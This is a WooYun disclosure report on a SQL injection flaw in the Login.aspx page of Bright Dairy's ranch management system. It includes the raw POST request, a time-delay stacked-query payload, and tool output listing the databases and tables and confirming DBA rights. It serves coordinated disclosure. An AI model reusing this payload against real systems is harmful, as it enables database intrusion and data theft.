Vulnerability Summary

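Bug ID: wooyun-2015-0163344

Title: SQL injection in the ranch management system of Bright Dairy & Food Co., Ltd. (光明乳业股份有限公司) / DBA privileges / os-shell possible

Vendor: Bright Dairy & Food Co., Ltd. (光明乳业股份有限公司)

Author: 逆流冰河

Submitted: 2015-12-22 13:44

Fixed: 2016-02-09 23:29

Published: 2016-02-09 23:29

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Response Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]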

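Vulnerability Details

Disclosure status:

2015-12-22: Details reported to the vendor; awaiting vendor handling
2015-12-26: Vendor confirmed; details disclosed to the vendor only
2016-01-05: Details disclosed to core white hats and experts in related fields
2016-01-15: Details disclosed to regular white hats
2016-01-25: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

1. Injection information: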

POST http://**.**.**.**:9020/Login.aspx HTTP/1.1
Host: **.**.**.**:9020
Connection: keep-alive
Content-Length: 252
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:9020
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:9020/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=vl4fvm55qcgzbj55gmxqmlyl

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTU2OTY3MDczMGRktSREY4caGdmzo3INPVhYCzx3WoA%3D&__EVENTVALIDATION=%2FwEWBALT3brtCAKl1bKzCQK1qbSWCwKC3IeGDB9FjOVkprJjDWikp2RbglC8Bwcc&txtUserName=admin*&txtPassWord=admin&btnLogin=+%E7%99%BB+%E5%BD%95+


2. Injection point
---
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTU2OTY3MDczMGRktSREY4caGdmzo3INPVhYCzx3WoA=&__EVENTVALIDATION=/wEWBALT3brtCAKl1bKzCQK1qbSWCwKC3IeGDB9FjOVkprJjDWikp2RbglC8Bwcc&txtUserName=admin';WAITFOR DELAY '0:0:5'--&txtPassWord=admin&btnLogin= %E7%99%BB %E5%BD%95
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] [HstNewCrmSH\x11]
[*] CIS
[*] HstEmp
[*] master
[*] model
[*] msdb
[*] ntmgr
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] yang
3. Table information
Database: CIS
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| dbo.V_product | 27754 |
| dbo.C_Cust_User | 8455 |
| dbo.C_ProdOutstore | 6400 |
| dbo.C_Crop | 4381 |
| dbo.C_ProdOutstore20130228 | 2764 |
| dbo.C_UR_Page | 2624 |
| dbo.C_Customer | 2092 |
| dbo.C_ProdInstore | 1326 |
| dbo.InitCustomer | 1138 |
| dbo.V_month_cows | 917 |
| dbo.c_prodinstore20130228 | 825 |
| dbo.InitProduct | 585 |
| dbo.InitCust2 | 549 |
| dbo.CowCalving | 547 |
| dbo.c_Prodinstore_20121204 | 516 |
| dbo.c_prodinstore_temp | 516 |
| dbo.aqyb | 455 |
| dbo.Cowbaobiao | 367 |
| dbo.prodext | 339 |
| dbo.Cowout | 332 |
| dbo.CowSell | 229 |
| dbo.InitProd | 184 |
| dbo.C_House_Man | 144 |
| dbo.Cost | 120 |
| dbo.C_Page | 101 |
| dbo.C_ProdExt | 79 |
| dbo.C_Supplier | 68 |
| dbo.C_Prov | 40 |
| dbo.C_User_Role | 38 |
| dbo.C_Meadow | 35 |
| dbo.duiying | 32 |
| dbo.C_Parameter | 31 |
| dbo.InitProv | 31 |
| dbo.Cowdie | 22 |
| dbo.C_Role | 14 |
| dbo.C_Region | 13 |
| dbo.C_Prod_Type | 8 |
| dbo.C_Siliao | 6 |
| dbo.C_House | 5 |
| dbo.C_Peizhong | 5 |
| dbo.C_Prop | 2 |
| dbo.C_SMilkOut | 2 |
| dbo.C_PeizhongOperator | 1 |
| dbo.C_ShouyaoOperator | 1 |
| dbo.C_SiliaoOperator | 1 |
| dbo.C_SMilkOperator | 1 |
| dbo.C_UR_Type | 1 |
| dbo.Orders | 1 |
| dbo.sysdiagrams | 1 |
+----------------------------+---------+
4. DBA privileges
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True

Proof of vulnerability:

Fix

Remediation:

Fix

Copyright notice: when reposting, please credit the source 逆流冰河@乌云 (WooYun)


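Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-12-26 23:28

Vendor reply:

CNVD has confirmed the reported situation, and CNVD has notified the organization that manages the website through the contact details published on the site.

Latest status:

None yet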